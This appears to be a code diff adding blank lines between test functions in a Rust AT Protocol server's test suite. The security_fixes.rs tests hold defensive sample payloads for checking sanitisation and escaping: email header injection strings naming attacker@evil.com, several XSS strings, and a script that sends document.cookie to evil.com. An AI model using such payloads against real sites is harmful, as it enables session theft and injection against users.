#[test] 520 fn test_validate_collection_nsid_valid() { 521 assert!(validate_collection_nsid("app.bsky.feed.post").is_ok()); ··· 523 assert!(validate_collection_nsid("a.b.c").is_ok()); 524 assert!(validate_collection_nsid("my-app.domain.record-type").is_ok()); 525 } 526 + 527 #[test] 528 fn test_validate_collection_nsid_empty() { 529 let result = validate_collection_nsid(""); 530 assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 531 } 532 + 533 #[test] 534 fn test_validate_collection_nsid_too_few_segments() { 535 assert!(validate_collection_nsid("a").is_err()); 536 assert!(validate_collection_nsid("a.b").is_err()); 537 } 538 + 539 #[test] 540 fn test_validate_collection_nsid_empty_segment() { 541 assert!(validate_collection_nsid("a..b.c").is_err()); 542 assert!(validate_collection_nsid(".a.b.c").is_err()); 543 assert!(validate_collection_nsid("a.b.c.").is_err()); 544 } 545 + 546 #[test] 547 fn test_validate_collection_nsid_invalid_chars() { 548 assert!(validate_collection_nsid("a.b.c/d").is_err()); 549 assert!(validate_collection_nsid("a.b.c_d").is_err()); 550 assert!(validate_collection_nsid("a.b.c@d").is_err()); 551 } 552 + 553 #[test] 554 fn test_validate_threadgate() { 555 let validator = RecordValidator::new(); ··· 561 let result = validator.validate(&gate, "app.bsky.feed.threadgate"); 562 assert_eq!(result.unwrap(), ValidationStatus::Valid); 563 } 564 + 565 #[test] 566 fn test_validate_labeler_service() { 567 let validator = RecordValidator::new(); ··· 575 let result = validator.validate(&labeler, "app.bsky.labeler.service"); 576 assert_eq!(result.unwrap(), ValidationStatus::Valid); 577 } 578 + 579 #[test] 580 fn test_validate_list_item() { 581 let validator = RecordValidator::new();
+6
tests/repo_batch.rs
··· 3 use chrono::Utc; 4 use reqwest::StatusCode; 5 use serde_json::{Value, json}; 6 #[tokio::test] 7 async fn test_apply_writes_create() { 8 let client = client(); ··· 50 assert!(results[0]["uri"].is_string()); 51 assert!(results[0]["cid"].is_string()); 52 } 53 #[tokio::test] 54 async fn test_apply_writes_update() { 55 let client = client(); ··· 108 assert_eq!(results.len(), 1); 109 assert!(results[0]["uri"].is_string()); 110 } 111 #[tokio::test] 112 async fn test_apply_writes_delete() { 113 let client = client(); ··· 171 .expect("Failed to verify"); 172 assert_eq!(get_res.status(), StatusCode::NOT_FOUND); 173 } 174 #[tokio::test] 175 async fn test_apply_writes_mixed_operations() { 176 let client = client(); ··· 258 let results = body["results"].as_array().unwrap(); 259 assert_eq!(results.len(), 3); 260 } 261 #[tokio::test] 262 async fn test_apply_writes_no_auth() { 263 let client = client(); ··· 286 .expect("Failed to send request"); 287 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 288 } 289 #[tokio::test] 290 async fn test_apply_writes_empty_writes() { 291 let client = client();
··· 3 use chrono::Utc; 4 use reqwest::StatusCode; 5 use serde_json::{Value, json}; 6 + 7 #[tokio::test] 8 async fn test_apply_writes_create() { 9 let client = client(); ··· 51 assert!(results[0]["uri"].is_string()); 52 assert!(results[0]["cid"].is_string()); 53 } 54 + 55 #[tokio::test] 56 async fn test_apply_writes_update() { 57 let client = client(); ··· 110 assert_eq!(results.len(), 1); 111 assert!(results[0]["uri"].is_string()); 112 } 113 + 114 #[tokio::test] 115 async fn test_apply_writes_delete() { 116 let client = client(); ··· 174 .expect("Failed to verify"); 175 assert_eq!(get_res.status(), StatusCode::NOT_FOUND); 176 } 177 + 178 #[tokio::test] 179 async fn test_apply_writes_mixed_operations() { 180 let client = client(); ··· 262 let results = body["results"].as_array().unwrap(); 263 assert_eq!(results.len(), 3); 264 } 265 + 266 #[tokio::test] 267 async fn test_apply_writes_no_auth() { 268 let client = client(); ··· 291 .expect("Failed to send request"); 292 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 293 } 294 + 295 #[tokio::test] 296 async fn test_apply_writes_empty_writes() { 297 let client = client();
+6
tests/repo_blob.rs
··· 2 use common::*; 3 use reqwest::{StatusCode, header}; 4 use serde_json::Value; 5 #[tokio::test] 6 async fn test_upload_blob_no_auth() { 7 let client = client(); ··· 19 let body: Value = res.json().await.expect("Response was not valid JSON"); 20 assert_eq!(body["error"], "AuthenticationRequired"); 21 } 22 #[tokio::test] 23 async fn test_upload_blob_success() { 24 let client = client(); ··· 38 let body: Value = res.json().await.expect("Response was not valid JSON"); 39 assert!(body["blob"]["ref"]["$link"].as_str().is_some()); 40 } 41 #[tokio::test] 42 async fn test_upload_blob_bad_token() { 43 let client = client(); ··· 56 let body: Value = res.json().await.expect("Response was not valid JSON"); 57 assert_eq!(body["error"], "AuthenticationFailed"); 58 } 59 #[tokio::test] 60 async fn test_upload_blob_unsupported_mime_type() { 61 let client = client(); ··· 73 .expect("Failed to send request"); 74 assert_eq!(res.status(), StatusCode::OK); 75 } 76 #[tokio::test] 77 async fn test_list_missing_blobs() { 78 let client = client(); ··· 90 let body: Value = res.json().await.expect("Response was not valid JSON"); 91 assert!(body["blobs"].is_array()); 92 } 93 #[tokio::test] 94 async fn test_list_missing_blobs_no_auth() { 95 let client = client();
··· 2 use common::*; 3 use reqwest::{StatusCode, header}; 4 use serde_json::Value; 5 + 6 #[tokio::test] 7 async fn test_upload_blob_no_auth() { 8 let client = client(); ··· 20 let body: Value = res.json().await.expect("Response was not valid JSON"); 21 assert_eq!(body["error"], "AuthenticationRequired"); 22 } 23 + 24 #[tokio::test] 25 async fn test_upload_blob_success() { 26 let client = client(); ··· 40 let body: Value = res.json().await.expect("Response was not valid JSON"); 41 assert!(body["blob"]["ref"]["$link"].as_str().is_some()); 42 } 43 + 44 #[tokio::test] 45 async fn test_upload_blob_bad_token() { 46 let client = client(); ··· 59 let body: Value = res.json().await.expect("Response was not valid JSON"); 60 assert_eq!(body["error"], "AuthenticationFailed"); 61 } 62 + 63 #[tokio::test] 64 async fn test_upload_blob_unsupported_mime_type() { 65 let client = client(); ··· 77 .expect("Failed to send request"); 78 assert_eq!(res.status(), StatusCode::OK); 79 } 80 + 81 #[tokio::test] 82 async fn test_list_missing_blobs() { 83 let client = client(); ··· 95 let body: Value = res.json().await.expect("Response was not valid JSON"); 96 assert!(body["blobs"].is_array()); 97 } 98 + 99 #[tokio::test] 100 async fn test_list_missing_blobs_no_auth() { 101 let client = client();
+39
tests/security_fixes.rs
··· 4 }; 5 use bspds::oauth::templates::{login_page, error_page, success_page}; 6 use bspds::image::{ImageProcessor, ImageError}; 7 #[test] 8 fn test_sanitize_header_value_removes_crlf() { 9 let malicious = "Injected\r\nBcc: attacker@evil.com"; ··· 13 assert!(sanitized.contains("Injected"), "Original content should be preserved"); 14 assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)"); 15 } 16 #[test] 17 fn test_sanitize_header_value_preserves_content() { 18 let normal = "Normal Subject Line"; 19 let sanitized = sanitize_header_value(normal); 20 assert_eq!(sanitized, "Normal Subject Line"); 21 } 22 #[test] 23 fn test_sanitize_header_value_trims_whitespace() { 24 let padded = " Subject "; 25 let sanitized = sanitize_header_value(padded); 26 assert_eq!(sanitized, "Subject"); 27 } 28 #[test] 29 fn test_sanitize_header_value_handles_multiple_newlines() { 30 let input = "Line1\r\nLine2\nLine3\rLine4"; ··· 34 assert!(sanitized.contains("Line1"), "Content before newlines preserved"); 35 assert!(sanitized.contains("Line4"), "Content after newlines preserved"); 36 } 37 #[test] 38 fn test_email_header_injection_sanitization() { 39 let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value"; ··· 44 assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text"); 45 assert!(sanitized.contains("X-Injected:"), "All content on same line"); 46 } 47 #[test] 48 fn test_valid_phone_number_accepts_correct_format() { 49 assert!(is_valid_phone_number("+1234567890")); ··· 52 assert!(is_valid_phone_number("+4915123456789")); 53 assert!(is_valid_phone_number("+1")); 54 } 55 #[test] 56 fn test_valid_phone_number_rejects_missing_plus() { 57 assert!(!is_valid_phone_number("1234567890")); 58 assert!(!is_valid_phone_number("12025551234")); 59 } 60 #[test] 61 fn test_valid_phone_number_rejects_empty() { 62 assert!(!is_valid_phone_number("")); 63 } 64 #[test] 65 fn test_valid_phone_number_rejects_just_plus() { 66 assert!(!is_valid_phone_number("+")); 67 } 68 #[test] 69 fn test_valid_phone_number_rejects_too_long() { 70 assert!(!is_valid_phone_number("+12345678901234567890123")); 71 } 72 #[test] 73 fn test_valid_phone_number_rejects_letters() { 74 assert!(!is_valid_phone_number("+abc123")); 75 assert!(!is_valid_phone_number("+1234abc")); 76 assert!(!is_valid_phone_number("+a")); 77 } 78 #[test] 79 fn test_valid_phone_number_rejects_spaces() { 80 assert!(!is_valid_phone_number("+1234 5678")); 81 assert!(!is_valid_phone_number("+ 1234567890")); 82 assert!(!is_valid_phone_number("+1 ")); 83 } 84 #[test] 85 fn test_valid_phone_number_rejects_special_chars() { 86 assert!(!is_valid_phone_number("+123-456-7890")); 87 assert!(!is_valid_phone_number("+1(234)567890")); 88 assert!(!is_valid_phone_number("+1.234.567.890")); 89 } 90 #[test] 91 fn test_signal_recipient_command_injection_blocked() { 92 let malicious_inputs = vec![ ··· 103 assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input); 104 } 105 } 106 #[test] 107 fn test_image_file_size_limit_enforced() { 108 let processor = ImageProcessor::new(); ··· 119 Ok(_) => panic!("Should reject files over size limit"), 120 } 121 } 122 #[test] 123 fn test_image_file_size_limit_configurable() { 124 let processor = ImageProcessor::new().with_max_file_size(1024); ··· 126 let result = processor.process(&data, "image/jpeg"); 127 assert!(result.is_err(), "Should reject files over configured limit"); 128 } 129 #[test] 130 fn test_oauth_template_xss_escaping_client_id() { 131 let malicious_client_id = "<script>alert('xss')</script>"; ··· 133 assert!(!html.contains("<script>"), "Script tags should be escaped"); 134 assert!(html.contains("&lt;script&gt;"), "HTML entities should be used for escaping"); 135 } 136 #[test] 137 fn test_oauth_template_xss_escaping_client_name() { 138 let malicious_client_name = "<img src=x onerror=alert('xss')>"; ··· 140 assert!(!html.contains("<img "), "IMG tags should be escaped"); 141 assert!(html.contains("&lt;img"), "IMG tag should be escaped as HTML entity"); 142 } 143 #[test] 144 fn test_oauth_template_xss_escaping_scope() { 145 let malicious_scope = "\"><script>alert('xss')</script>"; 146 let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None); 147 assert!(!html.contains("<script>"), "Script tags in scope should be escaped"); 148 } 149 #[test] 150 fn test_oauth_template_xss_escaping_error_message() { 151 let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>"; 152 let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None); 153 assert!(!html.contains("<script>"), "Script tags in error should be escaped"); 154 } 155 #[test] 156 fn test_oauth_template_xss_escaping_login_hint() { 157 let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\""; ··· 159 assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint"); 160 assert!(html.contains("&quot;"), "Quotes should be escaped"); 161 } 162 #[test] 163 fn test_oauth_template_xss_escaping_request_uri() { 164 let malicious_uri = "\" onmouseover=\"alert('xss')\""; 165 let html = login_page("client123", None, None, malicious_uri, None, None); 166 assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri"); 167 } 168 #[test] 169 fn test_oauth_error_page_xss_escaping() { 170 let malicious_error = "<script>steal()</script>"; ··· 173 assert!(!html.contains("<script>"), "Script tags should be escaped in error page"); 174 assert!(!html.contains("<img "), "IMG tags should be escaped in error page"); 175 } 176 #[test] 177 fn test_oauth_success_page_xss_escaping() { 178 let malicious_name = "<script>steal_session()</script>"; 179 let html = success_page(Some(malicious_name)); 180 assert!(!html.contains("<script>"), "Script tags should be escaped in success page"); 181 } 182 #[test] 183 fn test_oauth_template_no_javascript_urls() { 184 let html = login_page("client123", None, None, "test-uri", None, None); ··· 188 let success_html = success_page(None); 189 assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs"); 190 } 191 #[test] 192 fn test_oauth_template_form_action_safe() { 193 let malicious_uri = "javascript:alert('xss')//"; 194 let html = login_page("client123", None, None, malicious_uri, None, None); 195 assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL"); 196 } 197 #[test] 198 fn test_send_error_types_have_display() { 199 let timeout = SendError::Timeout; ··· 203 assert!(!format!("{}", max_retries).is_empty()); 204 assert!(!format!("{}", invalid_recipient).is_empty()); 205 } 206 #[test] 207 fn test_send_error_timeout_message() { 208 let error = SendError::Timeout; 209 let msg = format!("{}", error); 210 assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout"); 211 } 212 #[test] 213 fn test_send_error_max_retries_includes_detail() { 214 let error = SendError::MaxRetriesExceeded("Server returned 503".to_string()); 215 let msg = format!("{}", error); 216 assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context"); 217 } 218 #[tokio::test] 219 async fn test_check_signup_queue_accepts_session_jwt() { 220 use common::{base_url, client, create_account_and_login}; ··· 231 let body: serde_json::Value = res.json().await.unwrap(); 232 assert_eq!(body["activated"], true); 233 } 234 #[tokio::test] 235 async fn test_check_signup_queue_no_auth() { 236 use common::{base_url, client}; ··· 245 let body: serde_json::Value = res.json().await.unwrap(); 246 assert_eq!(body["activated"], true); 247 } 248 #[test] 249 fn test_html_escape_ampersand() { 250 let html = login_page("client&test", None, None, "test-uri", None, None); 251 assert!(html.contains("&amp;"), "Ampersand should be escaped"); 252 assert!(!html.contains("client&test"), "Raw ampersand should not appear in output"); 253 } 254 #[test] 255 fn test_html_escape_quotes() { 256 let html = login_page("client\"test'more", None, None, "test-uri", None, None); 257 assert!(html.contains("&quot;") || html.contains("&#34;"), "Double quotes should be escaped"); 258 assert!(html.contains("&#39;") || html.contains("&apos;"), "Single quotes should be escaped"); 259 } 260 #[test] 261 fn test_html_escape_angle_brackets() { 262 let html = login_page("client<test>more", None, None, "test-uri", None, None); ··· 264 assert!(html.contains("&gt;"), "Greater than should be escaped"); 265 assert!(!html.contains("<test>"), "Raw angle brackets should not appear"); 266 } 267 #[test] 268 fn test_oauth_template_preserves_safe_content() { 269 let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com")); ··· 271 assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved"); 272 assert!(html.contains("user@example.com"), "Login hint should be preserved"); 273 } 274 #[test] 275 fn test_csrf_like_input_value_protection() { 276 let malicious = "\" onclick=\"alert('csrf')"; 277 let html = login_page("client", None, None, malicious, None, None); 278 assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable"); 279 } 280 #[test] 281 fn test_unicode_handling_in_templates() { 282 let unicode_client = "客户端 クライアント"; 283 let html = login_page(unicode_client, None, None, "test-uri", None, None); 284 assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded"); 285 } 286 #[test] 287 fn test_null_byte_in_input() { 288 let with_null = "client\0id"; 289 let sanitized = sanitize_header_value(with_null); 290 assert!(sanitized.contains("client"), "Content before null should be preserved"); 291 } 292 #[test] 293 fn test_very_long_input_handling() { 294 let long_input = "x".repeat(10000);
··· 4 }; 5 use bspds::oauth::templates::{login_page, error_page, success_page}; 6 use bspds::image::{ImageProcessor, ImageError}; 7 + 8 #[test] 9 fn test_sanitize_header_value_removes_crlf() { 10 let malicious = "Injected\r\nBcc: attacker@evil.com"; ··· 14 assert!(sanitized.contains("Injected"), "Original content should be preserved"); 15 assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)"); 16 } 17 + 18 #[test] 19 fn test_sanitize_header_value_preserves_content() { 20 let normal = "Normal Subject Line"; 21 let sanitized = sanitize_header_value(normal); 22 assert_eq!(sanitized, "Normal Subject Line"); 23 } 24 + 25 #[test] 26 fn test_sanitize_header_value_trims_whitespace() { 27 let padded = " Subject "; 28 let sanitized = sanitize_header_value(padded); 29 assert_eq!(sanitized, "Subject"); 30 } 31 + 32 #[test] 33 fn test_sanitize_header_value_handles_multiple_newlines() { 34 let input = "Line1\r\nLine2\nLine3\rLine4"; ··· 38 assert!(sanitized.contains("Line1"), "Content before newlines preserved"); 39 assert!(sanitized.contains("Line4"), "Content after newlines preserved"); 40 } 41 + 42 #[test] 43 fn test_email_header_injection_sanitization() { 44 let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value"; ··· 49 assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text"); 50 assert!(sanitized.contains("X-Injected:"), "All content on same line"); 51 } 52 + 53 #[test] 54 fn test_valid_phone_number_accepts_correct_format() { 55 assert!(is_valid_phone_number("+1234567890")); ··· 58 assert!(is_valid_phone_number("+4915123456789")); 59 assert!(is_valid_phone_number("+1")); 60 } 61 + 62 #[test] 63 fn test_valid_phone_number_rejects_missing_plus() { 64 assert!(!is_valid_phone_number("1234567890")); 65 assert!(!is_valid_phone_number("12025551234")); 66 } 67 + 68 #[test] 69 fn test_valid_phone_number_rejects_empty() { 70 assert!(!is_valid_phone_number("")); 71 } 72 + 73 #[test] 74 fn test_valid_phone_number_rejects_just_plus() { 75 assert!(!is_valid_phone_number("+")); 76 } 77 + 78 #[test] 79 fn test_valid_phone_number_rejects_too_long() { 80 assert!(!is_valid_phone_number("+12345678901234567890123")); 81 } 82 + 83 #[test] 84 fn test_valid_phone_number_rejects_letters() { 85 assert!(!is_valid_phone_number("+abc123")); 86 assert!(!is_valid_phone_number("+1234abc")); 87 assert!(!is_valid_phone_number("+a")); 88 } 89 + 90 #[test] 91 fn test_valid_phone_number_rejects_spaces() { 92 assert!(!is_valid_phone_number("+1234 5678")); 93 assert!(!is_valid_phone_number("+ 1234567890")); 94 assert!(!is_valid_phone_number("+1 ")); 95 } 96 + 97 #[test] 98 fn test_valid_phone_number_rejects_special_chars() { 99 assert!(!is_valid_phone_number("+123-456-7890")); 100 assert!(!is_valid_phone_number("+1(234)567890")); 101 assert!(!is_valid_phone_number("+1.234.567.890")); 102 } 103 + 104 #[test] 105 fn test_signal_recipient_command_injection_blocked() { 106 let malicious_inputs = vec![ ··· 117 assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input); 118 } 119 } 120 + 121 #[test] 122 fn test_image_file_size_limit_enforced() { 123 let processor = ImageProcessor::new(); ··· 134 Ok(_) => panic!("Should reject files over size limit"), 135 } 136 } 137 + 138 #[test] 139 fn test_image_file_size_limit_configurable() { 140 let processor = ImageProcessor::new().with_max_file_size(1024); ··· 142 let result = processor.process(&data, "image/jpeg"); 143 assert!(result.is_err(), "Should reject files over configured limit"); 144 } 145 + 146 #[test] 147 fn test_oauth_template_xss_escaping_client_id() { 148 let malicious_client_id = "<script>alert('xss')</script>"; ··· 150 assert!(!html.contains("<script>"), "Script tags should be escaped"); 151 assert!(html.contains("&lt;script&gt;"), "HTML entities should be used for escaping"); 152 } 153 + 154 #[test] 155 fn test_oauth_template_xss_escaping_client_name() { 156 let malicious_client_name = "<img src=x onerror=alert('xss')>"; ··· 158 assert!(!html.contains("<img "), "IMG tags should be escaped"); 159 assert!(html.contains("&lt;img"), "IMG tag should be escaped as HTML entity"); 160 } 161 + 162 #[test] 163 fn test_oauth_template_xss_escaping_scope() { 164 let malicious_scope = "\"><script>alert('xss')</script>"; 165 let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None); 166 assert!(!html.contains("<script>"), "Script tags in scope should be escaped"); 167 } 168 + 169 #[test] 170 fn test_oauth_template_xss_escaping_error_message() { 171 let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>"; 172 let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None); 173 assert!(!html.contains("<script>"), "Script tags in error should be escaped"); 174 } 175 + 176 #[test] 177 fn test_oauth_template_xss_escaping_login_hint() { 178 let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\""; ··· 180 assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint"); 181 assert!(html.contains("&quot;"), "Quotes should be escaped"); 182 } 183 + 184 #[test] 185 fn test_oauth_template_xss_escaping_request_uri() { 186 let malicious_uri = "\" onmouseover=\"alert('xss')\""; 187 let html = login_page("client123", None, None, malicious_uri, None, None); 188 assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri"); 189 } 190 + 191 #[test] 192 fn test_oauth_error_page_xss_escaping() { 193 let malicious_error = "<script>steal()</script>"; ··· 196 assert!(!html.contains("<script>"), "Script tags should be escaped in error page"); 197 assert!(!html.contains("<img "), "IMG tags should be escaped in error page"); 198 } 199 + 200 #[test] 201 fn test_oauth_success_page_xss_escaping() { 202 let malicious_name = "<script>steal_session()</script>"; 203 let html = success_page(Some(malicious_name)); 204 assert!(!html.contains("<script>"), "Script tags should be escaped in success page"); 205 } 206 + 207 #[test] 208 fn test_oauth_template_no_javascript_urls() { 209 let html = login_page("client123", None, None, "test-uri", None, None); ··· 213 let success_html = success_page(None); 214 assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs"); 215 } 216 + 217 #[test] 218 fn test_oauth_template_form_action_safe() { 219 let malicious_uri = "javascript:alert('xss')//"; 220 let html = login_page("client123", None, None, malicious_uri, None, None); 221 assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL"); 222 } 223 + 224 #[test] 225 fn test_send_error_types_have_display() { 226 let timeout = SendError::Timeout; ··· 230 assert!(!format!("{}", max_retries).is_empty()); 231 assert!(!format!("{}", invalid_recipient).is_empty()); 232 } 233 + 234 #[test] 235 fn test_send_error_timeout_message() { 236 let error = SendError::Timeout; 237 let msg = format!("{}", error); 238 assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout"); 239 } 240 + 241 #[test] 242 fn test_send_error_max_retries_includes_detail() { 243 let error = SendError::MaxRetriesExceeded("Server returned 503".to_string()); 244 let msg = format!("{}", error); 245 assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context"); 246 } 247 + 248 #[tokio::test] 249 async fn test_check_signup_queue_accepts_session_jwt() { 250 use common::{base_url, client, create_account_and_login}; ··· 261 let body: serde_json::Value = res.json().await.unwrap(); 262 assert_eq!(body["activated"], true); 263 } 264 + 265 #[tokio::test] 266 async fn test_check_signup_queue_no_auth() { 267 use common::{base_url, client}; ··· 276 let body: serde_json::Value = res.json().await.unwrap(); 277 assert_eq!(body["activated"], true); 278 } 279 + 280 #[test] 281 fn test_html_escape_ampersand() { 282 let html = login_page("client&test", None, None, "test-uri", None, None); 283 assert!(html.contains("&amp;"), "Ampersand should be escaped"); 284 assert!(!html.contains("client&test"), "Raw ampersand should not appear in output"); 285 } 286 + 287 #[test] 288 fn test_html_escape_quotes() { 289 let html = login_page("client\"test'more", None, None, "test-uri", None, None); 290 assert!(html.contains("&quot;") || html.contains("&#34;"), "Double quotes should be escaped"); 291 assert!(html.contains("&#39;") || html.contains("&apos;"), "Single quotes should be escaped"); 292 } 293 + 294 #[test] 295 fn test_html_escape_angle_brackets() { 296 let html = login_page("client<test>more", None, None, "test-uri", None, None); ··· 298 assert!(html.contains("&gt;"), "Greater than should be escaped"); 299 assert!(!html.contains("<test>"), "Raw angle brackets should not appear"); 300 } 301 + 302 #[test] 303 fn test_oauth_template_preserves_safe_content() { 304 let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com")); ··· 306 assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved"); 307 assert!(html.contains("user@example.com"), "Login hint should be preserved"); 308 } 309 + 310 #[test] 311 fn test_csrf_like_input_value_protection() { 312 let malicious = "\" onclick=\"alert('csrf')"; 313 let html = login_page("client", None, None, malicious, None, None); 314 assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable"); 315 } 316 + 317 #[test] 318 fn test_unicode_handling_in_templates() { 319 let unicode_client = "客户端 クライアント"; 320 let html = login_page(unicode_client, None, None, "test-uri", None, None); 321 assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded"); 322 } 323 + 324 #[test] 325 fn test_null_byte_in_input() { 326 let with_null = "client\0id"; 327 let sanitized = sanitize_header_value(with_null); 328 assert!(sanitized.contains("client"), "Content before null should be preserved"); 329 } 330 + 331 #[test] 332 fn test_very_long_input_handling() { 333 let long_input = "x".repeat(10000);
+17
tests/server.rs
··· 4 use helpers::verify_new_account; 5 use reqwest::StatusCode; 6 use serde_json::{Value, json}; 7 #[tokio::test] 8 async fn test_health() { 9 let client = client(); ··· 15 assert_eq!(res.status(), StatusCode::OK); 16 assert_eq!(res.text().await.unwrap(), "OK"); 17 } 18 #[tokio::test] 19 async fn test_describe_server() { 20 let client = client(); ··· 30 let body: Value = res.json().await.expect("Response was not valid JSON"); 31 assert!(body.get("availableUserDomains").is_some()); 32 } 33 #[tokio::test] 34 async fn test_create_session() { 35 let client = client(); ··· 69 let body: Value = res.json().await.expect("Response was not valid JSON"); 70 assert!(body.get("accessJwt").is_some()); 71 } 72 #[tokio::test] 73 async fn test_create_session_missing_identifier() { 74 let client = client(); ··· 90 res.status() 91 ); 92 } 93 #[tokio::test] 94 async fn test_create_account_invalid_handle() { 95 let client = client(); ··· 113 "Expected 400 for invalid handle chars" 114 ); 115 } 116 #[tokio::test] 117 async fn test_get_session() { 118 let client = client(); ··· 127 .expect("Failed to send request"); 128 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 129 } 130 #[tokio::test] 131 async fn test_refresh_session() { 132 let client = client(); ··· 188 assert_ne!(body["accessJwt"].as_str().unwrap(), access_jwt); 189 assert_ne!(body["refreshJwt"].as_str().unwrap(), refresh_jwt); 190 } 191 #[tokio::test] 192 async fn test_delete_session() { 193 let client = client(); ··· 202 .expect("Failed to send request"); 203 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 204 } 205 #[tokio::test] 206 async fn test_get_service_auth_success() { 207 let client = client(); ··· 230 assert_eq!(claims["sub"], did); 231 assert_eq!(claims["aud"], "did:web:example.com"); 232 } 233 #[tokio::test] 234 async fn test_get_service_auth_with_lxm() { 235 let client = client(); ··· 255 assert_eq!(claims["iss"], did); 256 assert_eq!(claims["lxm"], "com.atproto.repo.getRecord"); 257 } 258 #[tokio::test] 259 async fn test_get_service_auth_no_auth() { 260 let client = client(); ··· 272 let body: Value = res.json().await.expect("Response was not valid JSON"); 273 assert_eq!(body["error"], "AuthenticationRequired"); 274 } 275 #[tokio::test] 276 async fn test_get_service_auth_missing_aud() { 277 let client = client(); ··· 287 .expect("Failed to send request"); 288 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 289 } 290 #[tokio::test] 291 async fn test_check_account_status_success() { 292 let client = client(); ··· 308 assert!(body["repoRev"].is_string()); 309 assert!(body["indexedRecords"].is_number()); 310 } 311 #[tokio::test] 312 async fn test_check_account_status_no_auth() { 313 let client = client(); ··· 323 let body: Value = res.json().await.expect("Response was not valid JSON"); 324 assert_eq!(body["error"], "AuthenticationRequired"); 325 } 326 #[tokio::test] 327 async fn test_activate_account_success() { 328 let client = client(); ··· 338 .expect("Failed to send request"); 339 assert_eq!(res.status(), StatusCode::OK); 340 } 341 #[tokio::test] 342 async fn test_activate_account_no_auth() { 343 let client = client(); ··· 351 .expect("Failed to send request"); 352 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 353 } 354 #[tokio::test] 355 async fn test_deactivate_account_success() { 356 let client = client();
··· 4 use helpers::verify_new_account; 5 use reqwest::StatusCode; 6 use serde_json::{Value, json}; 7 + 8 #[tokio::test] 9 async fn test_health() { 10 let client = client(); ··· 16 assert_eq!(res.status(), StatusCode::OK); 17 assert_eq!(res.text().await.unwrap(), "OK"); 18 } 19 + 20 #[tokio::test] 21 async fn test_describe_server() { 22 let client = client(); ··· 32 let body: Value = res.json().await.expect("Response was not valid JSON"); 33 assert!(body.get("availableUserDomains").is_some()); 34 } 35 + 36 #[tokio::test] 37 async fn test_create_session() { 38 let client = client(); ··· 72 let body: Value = res.json().await.expect("Response was not valid JSON"); 73 assert!(body.get("accessJwt").is_some()); 74 } 75 + 76 #[tokio::test] 77 async fn test_create_session_missing_identifier() { 78 let client = client(); ··· 94 res.status() 95 ); 96 } 97 + 98 #[tokio::test] 99 async fn test_create_account_invalid_handle() { 100 let client = client(); ··· 118 "Expected 400 for invalid handle chars" 119 ); 120 } 121 + 122 #[tokio::test] 123 async fn test_get_session() { 124 let client = client(); ··· 133 .expect("Failed to send request"); 134 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 135 } 136 + 137 #[tokio::test] 138 async fn test_refresh_session() { 139 let client = client(); ··· 195 assert_ne!(body["accessJwt"].as_str().unwrap(), access_jwt); 196 assert_ne!(body["refreshJwt"].as_str().unwrap(), refresh_jwt); 197 } 198 + 199 #[tokio::test] 200 async fn test_delete_session() { 201 let client = client(); ··· 210 .expect("Failed to send request"); 211 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 212 } 213 + 214 #[tokio::test] 215 async fn test_get_service_auth_success() { 216 let client = client(); ··· 239 assert_eq!(claims["sub"], did); 240 assert_eq!(claims["aud"], "did:web:example.com"); 241 } 242 + 243 #[tokio::test] 244 async fn test_get_service_auth_with_lxm() { 245 let client = client(); ··· 265 assert_eq!(claims["iss"], did); 266 assert_eq!(claims["lxm"], "com.atproto.repo.getRecord"); 267 } 268 + 269 #[tokio::test] 270 async fn test_get_service_auth_no_auth() { 271 let client = client(); ··· 283 let body: Value = res.json().await.expect("Response was not valid JSON"); 284 assert_eq!(body["error"], "AuthenticationRequired"); 285 } 286 + 287 #[tokio::test] 288 async fn test_get_service_auth_missing_aud() { 289 let client = client(); ··· 299 .expect("Failed to send request"); 300 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 301 } 302 + 303 #[tokio::test] 304 async fn test_check_account_status_success() { 305 let client = client(); ··· 321 assert!(body["repoRev"].is_string()); 322 assert!(body["indexedRecords"].is_number()); 323 } 324 + 